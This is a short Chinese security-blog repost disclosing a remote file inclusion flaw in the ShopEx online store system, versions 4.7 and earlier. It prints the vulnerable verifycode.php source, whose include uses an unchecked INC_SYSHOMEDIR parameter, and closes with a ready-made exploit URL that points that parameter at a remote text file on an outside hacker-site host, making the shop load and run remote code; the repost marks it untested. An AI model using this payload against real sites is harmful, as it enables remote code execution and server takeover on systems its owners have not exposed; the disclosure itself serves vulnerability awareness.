ShopEx PHP远程包含漏洞 's

admin

104722
文章

87
评论

2017年4月30日10:08:27评论287 views字数 703阅读2分20秒阅读模式

摘要

鬼仔注：未测试。文章作者：寂寞hacker
信息来源：http://hi.baidu.com/isbx/影响版本：4.7及以下

鬼仔注：未测试。

文章作者：寂寞hacker
信息来源：http://hi.baidu.com/isbx/

影响版本：4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <[email protected]>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP"))
{
Header("Location:../index.php");
exit;
}
/* 调用 session 文件 */
include_once($INC_SYSHOMEDIR."include/session.inc.php");

mt_srand((double)microtime() * 1000000);
/* 生成验证码 */
$strValidate = mt_rand(1000, 9999);
session_unregister("RANDOM_CODE");
session_register("RANDOM_CODE");
$_SESSION["RANDOM_CODE"] = $strValidate."";
$verifyImg = newclass("verifyCode", $strValidate);

/* 输出验证码图片 */
$verifyImg->Output();
?>

Exp: shop/verifycode.php?INC_SYSHOMEDIR=http://www.ynhacker.com/conn.txt?

左青龙
微信扫一扫

右白虎
微信扫一扫

ShopEx PHP远程包含漏洞 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信